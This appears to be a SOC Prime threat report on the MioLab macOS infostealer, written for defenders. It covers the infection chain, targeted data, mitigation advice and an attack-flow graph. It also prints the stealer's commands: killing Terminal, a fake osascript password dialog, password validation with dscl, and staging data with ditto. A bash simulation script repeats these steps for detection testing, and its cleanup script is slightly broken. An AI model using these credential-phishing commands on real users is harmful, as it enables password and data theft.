Say My Name: How MioLab is building MacOS Stealer Empire

Ruslan Mikhalov Chief of Threat Research at SOC Prime

Say My Name: How MioLab is building MacOS Stealer Empire

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

MioLab is a commercially distributed macOS infostealer aimed at high-value victims such as software engineers, executives, and cryptocurrency investors. It is spread through malvertising and a ClickFix infection chain, then launches a compact C-based binary that steals browser credentials, password manager records, cryptocurrency wallet files, and macOS Keychain data. The stolen information is staged in a temporary directory, compressed into an archive, and exfiltrated with a curl POST request to a malicious domain. The operation also includes a web-based control panel, proxy support, and API access tailored for large cybercrime groups.

Investigation

The report outlines the malware’s static traits, runtime behavior, and the broad range of targeted data sources, including Chrome, Firefox, Safari, Telegram, Discord, Apple Notes, and hardware wallet applications. Infrastructure analysis points to bulletproof hosting in Russia, repeated domain rotation, and a shared backend tied to a Web3 token-airdrop phishing operation. Investigators also extracted key indicators such as command lines, temporary folder paths, and exfiltration URLs.

Mitigation

Defenders should train users to recognize fake credential prompts, monitor abuse of built-in binaries such as dscl, osascript, and curl, block known malicious domains, enforce code-signing, and restrict access to browser profile data and Keychain files. Detection logic should also focus on the malware’s process execution patterns and archive staging behavior under /var/folders.

Response

If MioLab is detected, isolate the affected Mac, capture volatile memory and filesystem artifacts, block the related C2 domains and IPs, revoke exposed credentials and cryptocurrency wallet keys, and perform a full forensic review of all targeted data locations. Endpoint detection content should be updated with the observed command lines, and teams should hunt for similar infection chains across the environment.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc %% Malware node malware_miolab["Malware – Name: MioLab Infostealer Description: Multiu2011stage macOS infostealer"] class malware_miolab malware %% Initial Access initial_access["Action – T1204.002 User Execution: Victim opens malicious DMG or Unix executable delivered via social engineering"] class initial_access action %% Execution execution_unix_shell["Action – T1059.004 Unix Shell: Payload runs shell commands via sh, system and AppleScript"] class execution_unix_shell action %% Defense Evasion defense_evasion["Action – T1564.011 Hide Artifacts: Terminates Terminal, removes quarantine attributes and applies XOR string obfuscation (T1027)"] class defense_evasion action %% Discovery discovery_info["Action – T1589 Gather Victim Host Information: Uses <code>system_profiler</code> to collect hardware and OS details"] class discovery_info action %% Credential Access credential_access["Action – T1056 Input Capture and T1555.001/002 Credential Dumping: Shows fake System Preferences password dialog via AppleScript, validates with dscl, dumps Keychain files and extracts browser databases, cookies and session tokens"] class credential_access action %% Collection collection_staging["Action – T1074.001 Local Data Staging and T1560 Archive Collected Data: Gathers files, notes and crypto wallets, stages in temporary directory and compresses into ZIP archive"] class collection_staging action %% Exfiltration exfiltration_curl["Action – T1041 Exfiltration Over C2 Channel and T1102.003 Web Protocols: Uploads ZIP archive via <code>curl</code> POST to malicious web service"] class exfiltration_curl action %% Command and Control c2_proxy["Action – T1090.002 Proxy and T1659 Dynamic Content Injection: Traffic routed through attackeru2011controlled proxy servers and injection domains"] class c2_proxy action %% Tool nodes tool_applescript["Tool – Name: AppleScript Purpose: Displays credentialu2011prompt UI"] class tool_applescript tool tool_dscl["Tool – Name: dscl Purpose: Validates captured credentials"] class tool_dscl tool tool_curl["Tool – Name: curl Purpose: Sends collected archive to remote server"] class tool_curl tool tool_system_profiler["Tool – Name: system_profiler Purpose: Retrieves system information"] class tool_system_profiler tool %% Connections showing the attack flow malware_miolab –>|delivers| initial_access initial_access –>|triggers| execution_unix_shell execution_unix_shell –>|enables| defense_evasion defense_evasion –>|allows| discovery_info discovery_info –>|provides data to| credential_access credential_access –>|uses| tool_applescript credential_access –>|uses| tool_dscl credential_access –>|leads to| collection_staging collection_staging –>|compresses and stages| exfiltration_curl exfiltration_curl –>|uses| tool_curl exfiltration_curl –>|sends data to| c2_proxy c2_proxy –>|routes through| tool_curl %% Styling assignments class initial_access,execution_unix_shell,defense_evasion,discovery_info,credential_access,collection_staging,exfiltration_curl,c2_proxy action class tool_applescript,tool_dscl,tool_curl,tool_system_profiler tool class malware_miolab malware "

Attack Flow

Attack Narrative & Commands:
1. Terminate the user’s Terminal session – The malware first disables the standard command prompt to force the user into a controlled UI flow.
```
killall Terminal
```
2. Present a fake credential‑prompt – Using osascript, the attacker shows an AppleScript dialog that mimics a system‑settings warning, coaxing the user to input their password.
```
osascript -e 'display dialog "You need to configure system settings before running this application." default answer "" with hidden answer'
```
3. Validate harvested credentials – The captured password is verified against the local directory service with dscl . -authonly. A successful return confirms the credential is correct.
```
dscl . -authonly "$USER" "$HARVESTED_PASSWORD"
```
4. Stage and compress exfiltration payload – The attacker archives the harvested data (e.g., ~/.ssh/id_rsa) into a zip archive using ditto, preparing it for upload.
```
ditto -c -k --sequesterRsrc /var/folders/*/DataStaging /tmp/exfil.zip
```

Regression Test Script: (Bash – runs the exact sequence to trigger the rule)

#!/usr/bin/env bash
set -euo pipefail

echo "[*] Starting MioLab simulation..."

# 1. Kill Terminal
echo "[+] Killing Terminal"
killall Terminal

# 2. Fake AppleScript prompt (simulated – no user interaction)
echo "[+] Displaying fake credential prompt"
osascript -e 'display dialog "You need to configure system settings before running this application." default answer "" with hidden answer' >/dev/null 2>&1

# 3. Credential verification (using current user & a dummy password)
echo "[+] Verifying harvested credentials"
HARVESTED_PASSWORD="P@ssw0rd!"   # In a real scenario this would be the stolen password
dscl . -authonly "$USER" "$HARVESTED_PASSWORD" || true   # ignore failure for demo

# 4. Data staging & compression
echo "[+] Compressing staged data"
STAGING_DIR=$(mktemp -d)
echo "sample data" > "$STAGING_DIR/sample.txt"
ditto -c -k --sequesterRsrc "$STAGING_DIR" /tmp/exfil.zip

echo "[*] Simulation complete. Check SIEM for alert."

Cleanup Commands: (Removes generated artifacts and restores session)

#!/usr/bin/env bash
set -euo pipefail

echo "[*] Cleaning up MioLab simulation artifacts..."

# Remove the fake zip archive
rm -f /tmp/exfil.zip

# Remove temporary staging directory if it exists
[[ -d "$STAGING_DIR" ]] && rm -rf "$STAGING_DIR"

# Optionally restart Terminal for the user
open -a Terminal

echo "[*] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free